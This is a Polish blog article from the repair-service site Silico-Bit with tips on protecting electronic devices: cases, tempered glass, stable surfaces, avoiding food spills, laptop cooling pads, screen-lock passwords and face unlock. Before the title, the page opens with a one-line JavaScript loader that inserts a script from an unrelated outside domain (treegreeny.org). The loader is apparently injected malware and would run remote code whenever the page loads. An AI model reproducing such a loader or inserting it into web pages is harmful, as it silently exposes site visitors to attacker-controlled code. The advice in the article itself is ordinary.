;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zasady bezpiecznego użytkowania sprzętu elektronicznego | Silico-Bit
Zasady dotyczące bezpieczeństwa naszego sprzętu elektronicznego zazwyczaj wyznaczamy sobie sami. Staramy się wówczas, aby nic złego nie stało się naszemu komputerowi czy telefonowi. Jednak z biegiem czasu, kiedy nasz sprzęt przestaje już być tym „nowym nabytkiem”, zapominamy o kwestiach bezpiecznego użytkowania. Warto więc znać ogólne zasady, które uchronią nasze sprzęty elektroniczne przed usterkami.

 

Futerał, etui, pokrowiec, torba, szkło hartowane

Nieodzownym elementem bezpieczeństwa, niezależnie od rodzaju sprzętu, jaki posiadamy, są różnego rodzaju pokrowce i etui. To one bezpośrednio chronią urządzenia przed zarysowaniem, upadkiem na twarde podłoże czy zbiciem o twardy przedmiot.

Szkło hartowane ma na celu zabezpieczenie ekranu telefonu podczas upadku z wysokości lub styczności szybki z ostrym czy twardym przedmiotem. Chroni również ekran przed zarysowaniem. Niewątpliwym atutem szkła hartowanego jest fakt, że przy upadku z wysokości to bezpośrednio ono ulega stłuczeniu, a szybka pozostaje nietknięta. Cena szkła hartowanego zazwyczaj wynosi około 30 zł, ale ochrona jaką zapewnia, jest naprawdę bezcenna. Po zniszczeniu wystarczy ją po prostu wymienić.

Futerały, torby i pokrowce przydają się szczególnie w przypadku podróżowania ze sprzętem elektronicznym lub przechowywania go. Zazwyczaj między warstwami materiału posiadają miękki wkład w postaci cienkiej gąbki, która zabezpiecza sprzęt przed uderzeniem. Idealnie sprawdzają się w przypadku laptopów, tabletów czy przenośnych ekranów.

Stabilna powierzchnia

Istotną zasadą, z punktu widzenia bezpieczeństwa sprzętu, jednak w większości przypadków z pewnością pomijana, jest stabilna powierzchnia, na której ustawiamy sprzęt. Zazwyczaj z laptopa i czy tabletu korzystamy siedząc na kanapie, czy leżąc w łóżku. Pamiętajmy zatem, że są to sytuacje niebezpieczne dla naszego sprzętu. Wystarczy chwila nieuwagi lub nieskoordynowany ruch, aby laptop czy tablet spadły na podłogę.

Bardzo częstą praktyką jest zasypianie podczas korzystania z laptopa. Wówczas, kiedy wykonujemy w nocy jakieś ruchy, nie pamiętamy, że laptop cały czas leży na łóżku czy kanapie. Szczególnie, jeśli śpimy. Taka sytuacja może być tragiczna w skutkach dla naszego sprzętu.

Spożywanie posiłków

O spożywaniu posiłków podczas korzystania ze sprzętu pisaliśmy już kilka razy. To właśnie pożywienie jest najczęstszą przyczyną uszkodzeń telefonu, tabletu czy laptopa. Woda, kawa, okruszki, nadzienie od czekolady pomiędzy klawiszami – to najgorsza zmora laptopów. Do tego jeszcze dochodzi zalany telefon i tablet umazany keczupem. To naprawdę może przysporzyć masę problemów.

Podstawka chłodząca

Świetnym patentem na stale grzejący się laptop jest podstawka chłodząca. Ma ona dwie główne funkcje – stabilne utrzymanie sprzętu oraz chłodzenie go i zapobieganie przegrzaniu. Niestety szczególnie te starsze laptopy mają to do siebie, że ulegają nadmiernemu grzaniu. To niestety nie sprzyja organizmowi człowieka, który zazwyczaj z laptopa korzysta trzymając go na kolanach. Nawet podłożona poduszka nic nie wskóra, a dodatkowo może zaszkodzić. Mimo wbudowanych mechanizmów chłodzących, poduszka zatrzymuje obieg powietrza i laptop może ulec uszkodzeniu. Taka chłodząca podstawa to ratunek nie tylko dla laptopa, ale także dla nas samych.

Ustanowienie haseł dostępu

Bezpieczeństwo sprzętu to nie tylko zewnętrzne elementy, ale także ochrona danych. Kradzież ważnych, poufnych danych z telefonu, laptopa czy tabletu, to bardzo częste przestępstwo. Kiedy już nasz sprzęt trafi w niepowołane ręce, możemy nie uchronić go przed kradzieżą wszelkich danych i plików, natomiast hasło może delikatnie opóźnić ten proces. Ustanowienie hasła, kodu czy wzoru do odblokowania blokady ekranu może uchronić nas przed włamaniem do tych najważniejszych miejsc, czyli np. do elektronicznego konta bankowego. Rozszyfrowanie blokady może zająć chwilę, w tym czasie mamy więc okazję jak najszybciej zablokować dostęp do kont czy mediów społecznościowych.

Odblokowanie za pomocą rozpoznawania twarzy

Świetnym zabezpieczeniem, jeszcze lepszym niż hasła czy kody, jest funkcja odblokowania ekranu za pomocą rozpoznawania twarzy. Nasza twarz jest niepowtarzalna, więc złamanie blokady nie będzie wcale takie łatwe. Jest to jedno z lepszych zabezpieczeń telefonu, dostępne od ręki. Więcej o zabezpieczeniu danych i narzędziach do tego typu działań przeczytasz w naszym artykule https://silico-bit.com/blog/jak-zabezpieczyc-telefon-laptop-tablet-przed-wlamaniem-i-kradzieza-danych.

W przypadku usterki sprzętu na skutek nieszczęśliwego wypadku, zawsze możesz skorzystać ze sprawdzonego serwisu, który rozpozna przyczynę uszkodzenia i naprawi jego skutki.